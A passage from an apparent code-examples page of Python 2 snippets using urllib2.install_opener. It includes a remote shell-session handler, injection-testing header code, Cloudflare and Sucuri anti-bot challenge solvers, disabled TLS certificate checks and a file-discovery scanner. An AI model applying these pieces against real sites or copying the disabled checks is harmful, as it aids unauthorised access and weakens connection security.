                    cprint(errmsg, 'red')
                time.sleep(1)

                sc = ''
                buffer = listen.socket.recv(1024)

                if buffer == '':
                    errmsg = colored('\n[!] Lost connection. Exiting...',
                                     'red')
                    cprint(errmsg, 'red')
                    listen.socket.close()
                    exit(1)
                while buffer != '':
                    sc = sc + buffer  # sc +=+ buffer # convert " to '
                    try:
                        buffer = listen.socket.recv(1024)
                    except:
                        buffer = ''
                sc = [
                    i for i in sc.split('\n')[:-1] if not any(s in i for s in [
                        'job control in this shell',
                        'cannot set terminal process group',
                        'can\'t access tty', '<'
                    ])
                ]
                return sc
            except:
                if (listen.socket.sendall(cmd + "\n") != None):
                    errmsg = colored('\n[!] [!] Error in sending data (#2)',
                                     'red')
                    cprint(errmsg, 'red')
                pass
        elif getargs.connect:
            try:
                if (connect.socket.send(cmd + "\n") == None):
                    errmsg = colored('\n[!] Error in sending data (#1)', 'red')
                    cprint(errmsg, 'red')
                time.sleep(1)

                sc = ''
                buffer = connect.socket.recv(1024)

                if buffer == '':
                    errmsg = colored('\n[!] Lost connection. Exiting...',
                                     'red')
                    cprint(errmsg, 'red')
                    connect.socket.close()
                    exit(1)
                while buffer != '':
                    sc = sc + buffer
                    try:
                        buffer = connect.socket.recv(1024)
                    except:
                        buffer = ''

                return sc.split('\n')[:-1]
            except:
                pass
        else:
            errmsg = colored('\n[!] Unsupported mode!', 'red')
            cprint(errmsg, 'red')
            exit(1)
Ejemplo n.º 32
0
    @param proxy: The HTTP proxy server to use. For example:
        'http://proxy.example.com:3128/'
    @param user: The username to authenticate with. Use C{None} to disable 
    authentication.
    @param password: The password to authenticate with.
    """
    import urllib
    import urllib2

    if proxy is None:
        # Try and find the system proxy settings
        try:
            proxy = urllib.getproxies()['http']
        except KeyError:
            raise ValueError('Could not detect default proxy settings')

    # Set up the proxy handler
    proxy_handler = urllib2.ProxyHandler({'http': proxy})
    opener = urllib2.build_opener(proxy_handler)

    if user is not None:
        # Set up basic proxy authentication if provided
        password_manager = urllib2.HTTPPasswordMgrWithDefaultRealm()
        password_manager.add_password(realm=None, uri=proxy, user=user,
                passwd=password)
        opener.add_handler(urllib2.ProxyBasicAuthHandler(password_manager))
        opener.add_handler(urllib2.ProxyDigestAuthHandler(password_manager))

    # Overide the existing url opener
    urllib2.install_opener(opener)
Ejemplo n.º 33
0
def do_check(request):

    # Check if defined any Host HTTP header.
    if menu.options.host and settings.HOST_INJECTION == None:
        request.add_header(settings.HOST, menu.options.host)

    # Check if defined any User-Agent HTTP header.
    if menu.options.agent:
        request.add_header(settings.USER_AGENT, menu.options.agent)

    # Check if defined any Referer HTTP header.
    if menu.options.referer and settings.REFERER_INJECTION == None:
        request.add_header(settings.REFERER, menu.options.referer)

    # Check if defined any Cookie HTTP header.
    if menu.options.cookie and settings.COOKIE_INJECTION == False:
        request.add_header(settings.COOKIE, menu.options.cookie)

    if not checks.get_header(request.headers, settings.HTTP_ACCEPT_HEADER):
        request.add_header(settings.HTTP_ACCEPT_HEADER,
                           settings.HTTP_ACCEPT_HEADER_VALUE)

    # Appends a fake HTTP header 'X-Forwarded-For'
    if settings.TAMPER_SCRIPTS["xforwardedfor"]:
        from src.core.tamper import xforwardedfor
        xforwardedfor.tamper(request)

    # Check if defined any HTTP Authentication credentials.
    # HTTP Authentication: Basic / Digest Access Authentication.
    if not menu.options.ignore_401:
        if menu.options.auth_cred and menu.options.auth_type:
            try:
                settings.SUPPORTED_HTTP_AUTH_TYPES.index(
                    menu.options.auth_type)
                if menu.options.auth_type == "basic":
                    b64_string = base64.encodestring(
                        menu.options.auth_cred).replace('\n', '')
                    request.add_header("Authorization",
                                       "Basic " + b64_string + "")
                elif menu.options.auth_type == "digest":
                    try:
                        url = menu.options.url
                        try:
                            response = urllib2.urlopen(url)
                        except urllib2.HTTPError, e:
                            try:
                                authline = e.headers.get(
                                    'www-authenticate', '')
                                authobj = re.match('''(\w*)\s+realm=(.*),''',
                                                   authline).groups()
                                realm = authobj[1].split(',')[0].replace(
                                    "\"", "")
                                user_pass_pair = menu.options.auth_cred.split(
                                    ":")
                                username = user_pass_pair[0]
                                password = user_pass_pair[1]
                                authhandler = urllib2.HTTPDigestAuthHandler()
                                authhandler.add_password(
                                    realm, url, username, password)
                                opener = urllib2.build_opener(authhandler)
                                urllib2.install_opener(opener)
                                result = urllib2.urlopen(url)
                            except AttributeError:
                                pass
                    except urllib2.HTTPError, e:
                        pass
            except ValueError:
                err_msg = "Unsupported / Invalid HTTP authentication type '" + menu.options.auth_type + "'."
                err_msg += " Try basic or digest HTTP authentication type."
                print settings.print_critical_msg(err_msg)
                raise SystemExit()
        else:
            pass

    # The MIME media type for JSON.
    if settings.IS_JSON:
        request.add_header("Content-Type", "application/json")

    # Check if defined any extra HTTP headers.
    if menu.options.headers or menu.options.header:
        # Do replacement with the 'INJECT_HERE' tag, if the wildcard char is provided.
        if menu.options.headers:
            menu.options.headers = checks.wildcard_character(
                menu.options.headers)
            extra_headers = menu.options.headers
        else:
            menu.options.header = checks.wildcard_character(
                menu.options.header)
            extra_headers = menu.options.header

        extra_headers = extra_headers.replace(":", ": ")
        if ": //" in extra_headers:
            extra_headers = extra_headers.replace(": //", "://")

        if "\\n" in extra_headers:
            extra_headers = extra_headers.split("\\n")
            # Remove empty strings
            extra_headers = [x for x in extra_headers if x]
            if menu.options.header and not menu.options.headers and len(
                    extra_headers) > 1:
                warn_msg = "Swithing '--header' to '--headers' "
                warn_msg += "due to multiple extra HTTP headers."
                print settings.print_warning_msg(warn_msg)

        else:
            tmp_extra_header = []
            tmp_extra_header.append(extra_headers)
            extra_headers = tmp_extra_header

        for extra_header in extra_headers:
            # Extra HTTP Header name
            http_header_name = re.findall(r"(.*): ", extra_header)
            http_header_name = ''.join(http_header_name).strip()
            # Extra HTTP Header value
            http_header_value = re.findall(r":(.*)", extra_header)
            http_header_value = ''.join(http_header_value).strip()
            # Check if it is a custom header injection.
            if settings.CUSTOM_HEADER_INJECTION == False and \
               settings.INJECT_TAG in http_header_value:
                settings.CUSTOM_HEADER_INJECTION = True
                settings.CUSTOM_HEADER_NAME = http_header_name
            request.add_header(http_header_name, http_header_value)
Ejemplo n.º 34
0
    def get_cookie(self, netloc, ua, timeout):
        try:
            headers = {'User-Agent': ua}
            request = urllib2.Request(netloc)
            _add_request_header(request, headers)

            try:
                response = urllib2.urlopen(request, timeout=int(timeout))
            except urllib2.HTTPError as response:
                result = response.read(5242880)
                try:
                    encoding = response.info().getheader('Content-Encoding')
                except:
                    encoding = None
                if encoding == 'gzip':
                    result = gzip.GzipFile(
                        fileobj=StringIO.StringIO(result)).read()

            jschl = re.findall('name="jschl_vc" value="(.+?)"/>', result)[0]
            init = re.findall('setTimeout\(function\(\){\s*.*?.*:(.*?)};',
                              result)[-1]
            builder = re.findall(r"challenge-form\'\);\s*(.*)a.v", result)[0]
            decryptVal = self.parseJSString(init)
            lines = builder.split(';')

            for line in lines:
                if len(line) > 0 and '=' in line:
                    sections = line.split('=')
                    line_val = self.parseJSString(sections[1])
                    decryptVal = int(
                        eval(
                            str(decryptVal) + sections[0][-1] + str(line_val)))

            answer = decryptVal + len(urlparse.urlparse(netloc).netloc)
            query = '%s/cdn-cgi/l/chk_jschl?jschl_vc=%s&jschl_answer=%s' % (
                netloc, jschl, answer)

            if 'type="hidden" name="pass"' in result:
                passval = re.findall('name="pass" value="(.*?)"', result)[0]
                query = '%s/cdn-cgi/l/chk_jschl?pass=%s&jschl_vc=%s&jschl_answer=%s' % (
                    netloc, urllib.quote_plus(passval), jschl, answer)
                time.sleep(6)

            cookies = cookielib.LWPCookieJar()
            handlers = [
                urllib2.HTTPHandler(),
                urllib2.HTTPSHandler(),
                urllib2.HTTPCookieProcessor(cookies)
            ]
            opener = urllib2.build_opener(*handlers)
            opener = urllib2.install_opener(opener)

            try:
                request = urllib2.Request(query)
                _add_request_header(request, headers)
                response = urllib2.urlopen(request, timeout=int(timeout))
            except:
                pass

            cookie = '; '.join(['%s=%s' % (i.name, i.value) for i in cookies])

            if 'cf_clearance' in cookie:
                self.cookie = cookie
        except:
            pass
Ejemplo n.º 35
0
def request(url,
            close=True,
            redirect=True,
            error=False,
            proxy=None,
            post=None,
            headers=None,
            mobile=False,
            XHR=False,
            limit=None,
            referer=None,
            cookie=None,
            compression=True,
            output='',
            timeout='30',
            ignoreSsl=False,
            flare=True,
            ignoreErrors=None):
    try:
        if url is None:
            return None

        handlers = []

        if proxy is not None:
            handlers += [
                urllib2.ProxyHandler({'http': '%s' % (proxy)}),
                urllib2.HTTPHandler
            ]
            opener = urllib2.build_opener(*handlers)
            opener = urllib2.install_opener(opener)

        if output == 'cookie' or output == 'extended' or not close is True:
            cookies = cookielib.LWPCookieJar()
            handlers += [
                urllib2.HTTPHandler(),
                urllib2.HTTPSHandler(),
                urllib2.HTTPCookieProcessor(cookies)
            ]
            opener = urllib2.build_opener(*handlers)
            opener = urllib2.install_opener(opener)

        if ignoreSsl or ((2, 7, 8) < sys.version_info < (2, 7, 12)):
            try:
                import ssl
                ssl_context = ssl.create_default_context()
                ssl_context.check_hostname = False
                ssl_context.verify_mode = ssl.CERT_NONE
                handlers += [urllib2.HTTPSHandler(context=ssl_context)]
                opener = urllib2.build_opener(*handlers)
                opener = urllib2.install_opener(opener)
            except:
                pass

        if url.startswith('//'):
            url = 'http:' + url

        try:
            headers.update(headers)
        except:
            headers = {}

        if 'User-Agent' in headers:
            pass
        elif mobile is not True:
            # headers['User-Agent'] = agent()
            headers['User-Agent'] = cache.get(randomagent, 1)
        else:
            headers['User-Agent'] = 'Apple-iPhone/701.341'

        if 'Referer' in headers:
            pass
        elif referer is not None:
            headers['Referer'] = referer

        if 'Accept-Language' not in headers:
            headers['Accept-Language'] = 'en-US'

        if 'X-Requested-With' in headers:
            pass
        elif XHR is True:
            headers['X-Requested-With'] = 'XMLHttpRequest'

        if 'Cookie' in headers:
            pass
        elif cookie is not None:
            headers['Cookie'] = cookie

        if 'Accept-Encoding' in headers:
            pass
        elif compression and limit is None:
            headers['Accept-Encoding'] = 'gzip'

        if redirect is False:

            class NoRedirection(urllib2.HTTPErrorProcessor):
                def http_response(self, request, response):
                    return response

            opener = urllib2.build_opener(NoRedirection)
            opener = urllib2.install_opener(opener)

            try:
                del headers['Referer']
            except:
                pass

        if isinstance(post, dict):
            # Gets rid of the error: 'ascii' codec can't decode byte 0xd0 in position 0: ordinal not in range(128)
            for key, value in post.iteritems():
                try:
                    post[key] = value.encode('utf-8')
                except:
                    pass

            post = urllib.urlencode(post)

        request = urllib2.Request(url, data=post)
        _add_request_header(request, headers)

        try:
            response = urllib2.urlopen(request, timeout=int(timeout))
        except urllib2.HTTPError as response:
            try:
                ignore = ignoreErrors and (int(response.code) == ignoreErrors
                                           or int(
                                               response.code) in ignoreErrors)
            except:
                ignore = False

            if not ignore:
                if response.code in [301, 307, 308, 503]:
                    cf_result = response.read(5242880)

                    try:
                        encoding = response.info().getheader(
                            'Content-Encoding')
                    except:
                        encoding = None

                    if encoding == 'gzip':
                        cf_result = gzip.GzipFile(
                            fileobj=StringIO.StringIO(cf_result)).read()

                    if flare and 'cloudflare' in str(response.info()).lower():
                        try:
                            from resources.lib.modules import cfscrape
                            if isinstance(post, dict):
                                data = post
                            else:
                                try:
                                    data = urlparse.parse_qs(post)
                                except:
                                    data = None

                            scraper = cfscrape.CloudflareScraper()
                            response = scraper.request(
                                method='GET' if post is None else 'POST',
                                url=url,
                                headers=headers,
                                data=data,
                                timeout=int(timeout))
                            result = response.content
                            flare = 'cloudflare'  # Used below
                            try:
                                cookies = response.request._cookies
                            except:
                                log_utils.error()
                        except:
                            log_utils.error()

                    elif 'cf-browser-verification' in cf_result:
                        netloc = '%s://%s' % (urlparse.urlparse(url).scheme,
                                              urlparse.urlparse(url).netloc)
                        ua = headers['User-Agent']
                        cf = cache.get(cfcookie().get, 168, netloc, ua,
                                       timeout)
                        headers['Cookie'] = cf
                        request = urllib2.Request(url, data=post)
                        _add_request_header(request, headers)
                        response = urllib2.urlopen(request,
                                                   timeout=int(timeout))
                    else:
                        log_utils.log(
                            'Request-Error (%s): %s' %
                            (str(response.code), url), log_utils.LOGDEBUG)
                        if error is False:
                            return
                else:
                    log_utils.log(
                        'Request-Error (%s): %s' % (str(response.code), url),
                        log_utils.LOGDEBUG)
                    if error is False:
                        return

        if output == 'cookie':
            try:
                result = '; '.join(
                    ['%s=%s' % (i.name, i.value) for i in cookies])
            except:
                pass
            try:
                result = cf
            except:
                pass

            if close is True:
                response.close()
            return result

        elif output == 'geturl':
            result = response.geturl()
            if close is True:
                response.close()
            return result

        elif output == 'headers':
            result = response.headers
            if close is True:
                response.close()
            return result

        elif output == 'chunk':
            try:
                content = int(response.headers['Content-Length'])
            except:
                content = (2049 * 1024)

            if content < (2048 * 1024):
                return
            result = response.read(16 * 1024)
            if close is True:
                response.close()
            return result

        if flare != 'cloudflare':
            if limit == '0':
                result = response.read(224 * 1024)
            elif limit is not None:
                result = response.read(int(limit) * 1024)
            else:
                result = response.read(5242880)

        try:
            encoding = response.info().getheader('Content-Encoding')
        except:
            encoding = None

        if encoding == 'gzip':
            result = gzip.GzipFile(fileobj=StringIO.StringIO(result)).read()

        if 'sucuri_cloudproxy_js' in result:
            su = sucuri().get(result)

            headers['Cookie'] = su

            request = urllib2.Request(url, data=post)
            _add_request_header(request, headers)

            response = urllib2.urlopen(request, timeout=int(timeout))

            if limit == '0':
                result = response.read(224 * 1024)
            elif limit is not None:
                result = response.read(int(limit) * 1024)
            else:
                result = response.read(5242880)

            try:
                encoding = response.info().getheader('Content-Encoding')
            except:
                encoding = None
            if encoding == 'gzip':
                result = gzip.GzipFile(
                    fileobj=StringIO.StringIO(result)).read()

        if 'Blazingfast.io' in result and 'xhr.open' in result:
            netloc = '%s://%s' % (urlparse.urlparse(url).scheme,
                                  urlparse.urlparse(url).netloc)
            ua = headers['User-Agent']
            headers['Cookie'] = cache.get(bfcookie().get, 168, netloc, ua,
                                          timeout)
            result = _basic_request(url,
                                    headers=headers,
                                    post=post,
                                    timeout=timeout,
                                    limit=limit)

        if output == 'extended':
            try:
                response_headers = dict([(item[0].title(), item[1])
                                         for item in response.info().items()])
            except:
                response_headers = response.headers

            try:
                response_code = str(response.code)
            except:
                response_code = str(response.status_code
                                    )  # object from CFScrape Requests object.

            try:
                cookie = '; '.join(
                    ['%s=%s' % (i.name, i.value) for i in cookies])
            except:
                pass

            try:
                cookie = cf
            except:
                pass

            if close is True:
                response.close()
            return (result, response_code, response_headers, headers, cookie)
        else:
            if close is True:
                response.close()
            return result

    except Exception as e:
        log_utils.error()
        log_utils.log('Request-Error: (%s) => %s' % (str(e), url),
                      log_utils.LOGDEBUG)
        return
Ejemplo n.º 36
0
def request(url,
            close=True,
            redirect=True,
            error=False,
            proxy=None,
            post=None,
            headers=None,
            mobile=False,
            limit=None,
            referer=None,
            cookie=None,
            output='',
            timeout='30'):
    try:
        #control.log('@@@@@@@@@@@@@@ - URL:%s' % url)
        handlers = []

        if not proxy == None:
            handlers += [
                urllib2.ProxyHandler({'http': '%s' % (proxy)}),
                urllib2.HTTPHandler
            ]
            opener = urllib2.build_opener(*handlers)
            opener = urllib2.install_opener(opener)

        if output == 'cookie2' or output == 'cookie' or output == 'extended' or not close == True:
            cookies = cookielib.LWPCookieJar()
            handlers += [
                urllib2.HTTPHandler(),
                urllib2.HTTPSHandler(),
                urllib2.HTTPCookieProcessor(cookies)
            ]
            opener = urllib2.build_opener(*handlers)
            opener = urllib2.install_opener(opener)

        try:
            if sys.version_info < (2, 7, 9): raise Exception()
            import ssl
            ssl_context = ssl.create_default_context()
            ssl_context.check_hostname = False
            ssl_context.verify_mode = ssl.CERT_NONE
            handlers += [urllib2.HTTPSHandler(context=ssl_context)]
            opener = urllib2.build_opener(*handlers)
            opener = urllib2.install_opener(opener)
        except:
            pass

        try:
            headers.update(headers)
        except:
            headers = {}
        if 'User-Agent' in headers:
            pass
        elif not mobile == True:
            #headers['User-Agent'] = agent()
            headers['User-Agent'] = cache.get(randomagent, 1)
        else:
            headers['User-Agent'] = 'Apple-iPhone/701.341'
        if 'Referer' in headers:
            pass
        elif referer == None:
            headers['Referer'] = '%s://%s/' % (urlparse.urlparse(url).scheme,
                                               urlparse.urlparse(url).netloc)
        else:
            headers['Referer'] = referer
        if not 'Accept-Language' in headers:
            headers['Accept-Language'] = 'en-US'
        if 'Cookie' in headers:
            pass
        elif not cookie == None:
            headers['Cookie'] = cookie

        if redirect == False:

            class NoRedirection(urllib2.HTTPErrorProcessor):
                def http_response(self, request, response):
                    return response

            opener = urllib2.build_opener(NoRedirection)
            opener = urllib2.install_opener(opener)

            try:
                del headers['Referer']
            except:
                pass

        request = urllib2.Request(url, data=post, headers=headers)

        try:
            response = urllib2.urlopen(request, timeout=int(timeout))
        except urllib2.HTTPError as response:
            control.log("AAAA- CODE %s|%s " % (url, response.code))
            if response.code == 503:
                if 'cf-browser-verification' in response.read(5242880):
                    control.log("CF-OK")

                    netloc = '%s://%s' % (urlparse.urlparse(url).scheme,
                                          urlparse.urlparse(url).netloc)
                    cf = cache.get(cfcookie, 168, netloc,
                                   headers['User-Agent'], timeout)
                    headers['Cookie'] = cf
                    request = urllib2.Request(url, data=post, headers=headers)
                    response = urllib2.urlopen(request, timeout=int(timeout))
                elif error == False:
                    return

            elif response.code == 307:
                control.log("AAAA- Location: %s" %
                            (response.headers['Location'].rstrip()))
                cookie = ''
                try:
                    cookie = '; '.join(
                        ['%s=%s' % (i.name, i.value) for i in cookies])
                except:
                    pass
                headers['Cookie'] = cookie
                request = urllib2.Request(response.headers['Location'],
                                          data=post,
                                          headers=headers)
                response = urllib2.urlopen(request, timeout=int(timeout))
                #control.log("AAAA- BBBBBBB %s" %  response.code)

            elif error == False:
                print("Response code", response.code, response.msg, url)
                return

        if output == 'cookie':
            try:
                result = '; '.join(
                    ['%s=%s' % (i.name, i.value) for i in cookies])
            except:
                pass
            try:
                result = cf
            except:
                pass

        elif output == 'response':
            if limit == '0':
                result = (str(response.code), response.read(224 * 1024))
            elif not limit == None:
                result = (str(response.code), response.read(int(limit) * 1024))
            else:
                result = (str(response.code), response.read(5242880))

        elif output == 'chunk':
            try:
                content = int(response.headers['Content-Length'])
            except:
                content = (2049 * 1024)
            if content < (2048 * 1024): return
            result = response.read(16 * 1024)

        elif output == 'extended':
            try:
                cookie = '; '.join(
                    ['%s=%s' % (i.name, i.value) for i in cookies])
            except:
                pass
            try:
                cookie = cf
            except:
                pass
            content = response.headers
            result = response.read(5242880)
            return (result, headers, content, cookie)

        elif output == 'geturl':
            result = response.geturl()

        elif output == 'headers':
            content = response.headers
            return content

        else:
            if limit == '0':
                result = response.read(224 * 1024)
            elif not limit == None:
                result = response.read(int(limit) * 1024)
            else:
                result = response.read(5242880)

        if close == True:
            response.close()

        return result
    except Exception as e:
        control.log('Client ERR %s, url:' % (e, url))
        return
Ejemplo n.º 37
0
'''
response = urllib2.urlopen('http://www.baidu.com')

print response.getcode()
cont = response.read()
'''

url = 'http://www.baidu.com'
request = urllib2.Request(url)

request.add_header('User-Agent', 'Mozilla/5.0')

response = urllib2.urlopen(request)
print response.getcode()
cont = response.read()
'''
url = "http://www.baid.com"
cj = cookielib.CookieJar()

opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
urllib2.install_opener(opener)

response = urllib2.urlopen(url)
print response.getcode()
cont = response.read()
'''

try:
    f = os.open('index.html', os.O_CREAT | os.O_RDWR)
    os.write(f, cont)
except:
Ejemplo n.º 38
0
    def download_file(self):
        logger.info("Direct download")

        headers = []

        # Se asegura de que el fichero se podrá crear
        logger.info("nombrefichero=" + self.file_name)
        self.file_name = xbmc.makeLegalFilename(self.file_name)
        logger.info("nombrefichero=" + self.file_name)
        logger.info("url=" + self.url)

        # Crea el fichero
        existSize = 0
        f = open(self.file_name, 'wb')
        grabado = 0

        # Interpreta las cabeceras en una URL como en XBMC
        if "|" in self.url:
            additional_headers = self.url.split("|")[1]
            if "&" in additional_headers:
                additional_headers = additional_headers.split("&")
            else:
                additional_headers = [additional_headers]

            for additional_header in additional_headers:
                logger.info("additional_header: " + additional_header)
                name = re.findall("(.*?)=.*?", additional_header)[0]
                value = urllib.unquote_plus(
                    re.findall(".*?=(.*?)$", additional_header)[0])
                headers.append([name, value])

            self.url = self.url.split("|")[0]
            logger.info("url=" + self.url)

        # Timeout del socket a 60 segundos
        socket.setdefaulttimeout(60)

        # Crea la petición y añade las cabeceras
        h = urllib2.HTTPHandler(debuglevel=0)
        request = urllib2.Request(self.url)
        for header in headers:
            logger.info("Header=" + header[0] + ": " + header[1])
            request.add_header(header[0], header[1])

        # Lanza la petición
        opener = urllib2.build_opener(h)
        urllib2.install_opener(opener)
        try:
            connexion = opener.open(request)
        except urllib2.HTTPError, e:
            logger.error("error %d (%s) al abrir la url %s" %
                         (e.code, e.msg, self.url))
            # print e.code
            # print e.msg
            # print e.hdrs
            # print e.fp
            f.close()

            # El error 416 es que el rango pedido es mayor que el fichero => es que ya está completo
            if e.code == 416:
                return 0
            else:
                return -2
Ejemplo n.º 39
0
def main():
    """
    Initializes and executes the program
    """

    global args

    kb.files = []
    kb.found = False
    kb.print_lock = threading.Lock()
    kb.value_lock = threading.Lock()
    kb.versioned_locations = {}

    check_revision()

    print(BANNER)

    args = parse_args()

    if args.update:
        update()
        exit()

    with open("versions.ini") as f:
        section = None
        for line in f.xreadlines():
            line = line.strip()
            if re.match(r"\[.+\]", line):
                section = line.strip("[]")
            elif line:
                if section not in kb.versioned_locations:
                    kb.versioned_locations[section] = []
                kb.versioned_locations[section].append(line)

    cases = get_cases(args) if not args.list_file else load_list(
        args.list_file)

    if not cases:
        print("[!] No available test cases with the specified attributes.\n"
              "[!] Please verify available options with --list.")
        exit()

    if args.list:
        args.list = args.list.lower()

        _ = ("category", "software", "os")
        if args.list not in _:
            print("[!] Valid values for option '--list' are: %s" %
                  ", ".join(_))
            exit()

        print("[i] Listing available filters for usage with option '--%s':\n" %
              args.list)

        try:
            for _ in set([_[args.list] for _ in cases]):
                print(_ if re.search(r"\A[A-Za-z0-9]+\Z", _) else '"%s"' % _)
        except KeyError:
            pass
        finally:
            exit()

    if args.ignore_proxy:
        _ = ProxyHandler({})
        opener = build_opener(_)
        install_opener(opener)
    elif args.proxy:
        match = re.search(
            r"(?P<type>[^:]+)://(?P<address>[^:]+):(?P<port>\d+)", args.proxy,
            re.I)
        if match:
            if match.group("type").upper() in (PROXY_TYPE.HTTP,
                                               PROXY_TYPE.HTTPS):
                _ = ProxyHandler({match.group("type"): args.proxy})
                opener = build_opener(_)
                install_opener(opener)
            else:
                from thirdparty.socks import socks
                if match.group("type").upper() == PROXY_TYPE.SOCKS4:
                    socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS4,
                                          match.group("address"),
                                          int(match.group("port")), True)
                elif match.group("type").upper() == PROXY_TYPE.SOCKS5:
                    socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5,
                                          match.group("address"),
                                          int(match.group("port")), True)
        else:
            print(
                "[!] Wrong proxy format (proper example: \"http://127.0.0.1:8080\")."
            )
            exit()

    if args.random_agent:
        with open(USER_AGENTS_FILE, 'r') as f:
            args.user_agent = random.sample(f.readlines(), 1)[0]

    kb.parsed_target_url = urlsplit(args.url)
    kb.request_params = args.data if args.data else kb.parsed_target_url.query

    if not args.param:
        match = re.match("(?P<param>[^=&]+)=(?P<value>[^=&]+)",
                         kb.request_params)
        if match:
            args.param = match.group("param")
        else:
            found = False

            for match in re.finditer("(?P<param>[^=&]+)=(?P<value>[^=&]*)",
                                     kb.request_params):
                found = True
                print("[x] Parameter with empty value found ('%s')." %
                      match.group("param"))

            if found:
                print(
                    "[!] Please always use non-empty (valid) parameter values."
                )

            print("[!] No usable GET/POST parameters found.")
            exit()

    if args.os:
        kb.restrict_os = args.os

    print("[i] Starting scan at: %s\n" % time.strftime("%X"))
    print("[i] Checking original response...")

    request_args = prepare_request(None)
    request_args["url"] = args.url

    if args.data:
        request_args["data"] = args.data

    kb.original_response = get_page(**request_args)

    if not kb.original_response:
        print("[!] Something seems to be wrong with connection settings.")
        if not args.verbose:
            print("[i] Please rerun with switch '-v'.")
        exit()

    print("[i] Checking invalid response...")

    request_args = prepare_request(
        "%s%s%s" % (args.prefix, INVALID_FILENAME, args.postfix))
    kb.invalid_response = get_page(**request_args)

    print("[i] Done!")
    print("[i] Searching for files...")

    if args.threads > 1:
        print("[i] Starting %d threads." % args.threads)

    threads = []
    for i in xrange(args.threads):
        thread = threading.Thread(
            target=try_cases,
            args=([cases[_] for _ in xrange(i, len(cases), args.threads)], ))
        thread.daemon = True
        thread.start()
        threads.append(thread)

    alive = True
    while alive:
        alive = False
        for thread in threads:
            if thread.isAlive():
                alive = True
                time.sleep(0.1)

    if not kb.found:
        print("[i] No files found!")
    elif args.verbose:
        print("\n[i] Files found:")
        for _ in kb.files:
            print("[o] %s" % _)

    print("  \n[i] File search complete.")
    print("\n[i] Finishing scan at: %s\n" % time.strftime("%X"))
Ejemplo n.º 40
0
def request(url, close=True, redirect=True, error=False, proxy=None, post=None, headers=None, mobile=False, XHR=False, limit=None, referer=None, cookie=None, compression=True, output='', timeout='30'):
    try:
        if not url:
            return

        handlers = []

        if not proxy == None:
            handlers += [urllib2.ProxyHandler({'http':'%s' % (proxy)}), urllib2.HTTPHandler]
            opener = urllib2.build_opener(*handlers)
            opener = urllib2.install_opener(opener)


        if output == 'cookie' or output == 'extended' or not close == True:
            cookies = cookielib.LWPCookieJar()
            handlers += [urllib2.HTTPHandler(), urllib2.HTTPSHandler(), urllib2.HTTPCookieProcessor(cookies)]
            opener = urllib2.build_opener(*handlers)
            opener = urllib2.install_opener(opener)

        if (2, 7, 8) < sys.version_info < (2, 7, 12):
            try:
                import ssl; ssl_context = ssl.create_default_context()
                ssl_context.check_hostname = False
                ssl_context.verify_mode = ssl.CERT_NONE
                handlers += [urllib2.HTTPSHandler(context=ssl_context)]
                opener = urllib2.build_opener(*handlers)
                opener = urllib2.install_opener(opener)
            except:
                pass

        if url.startswith('//'): url = 'http:' + url

        _headers ={}
        try: _headers.update(headers)
        except: pass
        if 'User-Agent' in _headers:
            pass
        elif not mobile == True:
            #headers['User-Agent'] = agent()
            _headers['User-Agent'] = cache.get(randomagent, 1)
        else:
            _headers['User-Agent'] = 'Apple-iPhone/701.341'
        if 'Referer' in _headers:
            pass
        elif referer is not None:
            _headers['Referer'] = referer
        if not 'Accept-Language' in _headers:
            _headers['Accept-Language'] = 'en-US'
        if 'X-Requested-With' in _headers:
            pass
        elif XHR == True:
            _headers['X-Requested-With'] = 'XMLHttpRequest'
        if 'Cookie' in _headers:
            pass
        elif not cookie == None:
            _headers['Cookie'] = cookie
        if 'Accept-Encoding' in _headers:
            pass
        elif compression and limit is None:
            _headers['Accept-Encoding'] = 'gzip'


        if redirect == False:

            #old implementation
            #class NoRedirection(urllib2.HTTPErrorProcessor):
            #    def http_response(self, request, response): return response

            #opener = urllib2.build_opener(NoRedirection)
            #opener = urllib2.install_opener(opener)

            class NoRedirectHandler(urllib2.HTTPRedirectHandler):
                def http_error_302(self, req, fp, code, msg, headers):
                    infourl = urllib.addinfourl(fp, headers, req.get_full_url())
                    infourl.status = code
                    infourl.code = code
                    return infourl
                http_error_300 = http_error_302
                http_error_301 = http_error_302
                http_error_303 = http_error_302
                http_error_307 = http_error_302

            opener = urllib2.build_opener(NoRedirectHandler())
            urllib2.install_opener(opener)

            try: del _headers['Referer']
            except: pass

        if isinstance(post, dict):
            post = utils.byteify(post)
            post = urllib.urlencode(post)

        url = utils.byteify(url)

        request = urllib2.Request(url, data=post)
        _add_request_header(request, _headers)


        try:
            response = urllib2.urlopen(request, timeout=int(timeout))
        except urllib2.HTTPError as response:

            if response.code == 503:
                cf_result = response.read(5242880)
                try: encoding = response.info().getheader('Content-Encoding')
                except: encoding = None
                if encoding == 'gzip':
                    cf_result = gzip.GzipFile(fileobj=StringIO.StringIO(cf_result)).read()

                if 'cf-browser-verification' in cf_result:

                    netloc = '%s://%s' % (urlparse.urlparse(url).scheme, urlparse.urlparse(url).netloc)
                    
                    if not netloc.endswith('/'): netloc += '/'

                    ua = _headers['User-Agent']

                    cf = cache.get(cfcookie().get, 168, netloc, ua, timeout)

                    _headers['Cookie'] = cf

                    request = urllib2.Request(url, data=post)
                    _add_request_header(request, _headers)

                    response = urllib2.urlopen(request, timeout=int(timeout))
                else:
                    log_utils.log('Request-Error (%s): %s' % (str(response.code), url), log_utils.LOGDEBUG)
                    if error == False: return
            else:
                log_utils.log('Request-Error (%s): %s' % (str(response.code), url), log_utils.LOGDEBUG)
                if error == False: return


        if output == 'cookie':
            try: result = '; '.join(['%s=%s' % (i.name, i.value) for i in cookies])
            except: pass
            try: result = cf
            except: pass
            if close == True: response.close()
            return result

        elif output == 'geturl':
            result = response.geturl()
            if close == True: response.close()
            return result

        elif output == 'headers':
            result = response.headers
            if close == True: response.close()
            return result

        elif output == 'chunk':
            try: content = int(response.headers['Content-Length'])
            except: content = (2049 * 1024)
            if content < (2048 * 1024): return
            result = response.read(16 * 1024)
            if close == True: response.close()
            return result

        elif output == 'file_size':
            try: content = int(response.headers['Content-Length'])
            except: content = '0'
            response.close()
            return content
        
        if limit == '0':
            result = response.read(224 * 1024)
        elif not limit == None:
            result = response.read(int(limit) * 1024)
        else:
            result = response.read(5242880)

        try: encoding = response.info().getheader('Content-Encoding')
        except: encoding = None
        if encoding == 'gzip':
            result = gzip.GzipFile(fileobj=StringIO.StringIO(result)).read()


        if 'sucuri_cloudproxy_js' in result:
            su = sucuri().get(result)

            _headers['Cookie'] = su

            request = urllib2.Request(url, data=post)
